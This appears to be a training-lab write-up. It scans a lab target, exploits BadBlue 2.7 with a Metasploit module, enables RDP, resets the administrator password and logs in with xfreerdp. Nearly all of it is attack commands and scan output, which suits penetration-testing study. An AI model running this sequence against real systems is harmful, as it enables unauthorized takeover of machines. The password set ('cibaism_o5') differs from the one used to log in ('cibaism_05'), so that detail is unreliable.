Windows: Enabling Remote Desktop

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable application will be accessible at demo.ine.local.

Your task is to fingerprint the vulnerable application using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework. Then, enable the target machine RDP service and access it using xfreerdp tool.

Objective: Your task is to find and exploit the vulnerable application and get the RDP session to find the flag!

Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.

Tools

The best tools for this lab are:

• Nmap

• Metasploit Framework

• xfreerdp

Writeup

nmap -sSVC demo.ine.local

PORT      STATE SERVICE      VERSION
80/tcp    open  http         BadBlue httpd 2.7
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49165/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-06-10T18:08:35
|_  start_date: 2025-06-10T18:06:00

msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit

background
use post/windows/manage/enable_rdp
set session 1
run

sessions -i 1
shell
net user administrator cibaism_o5

xfreerdp /u:administrator /p:cibaism_05 /v:demo.ine.local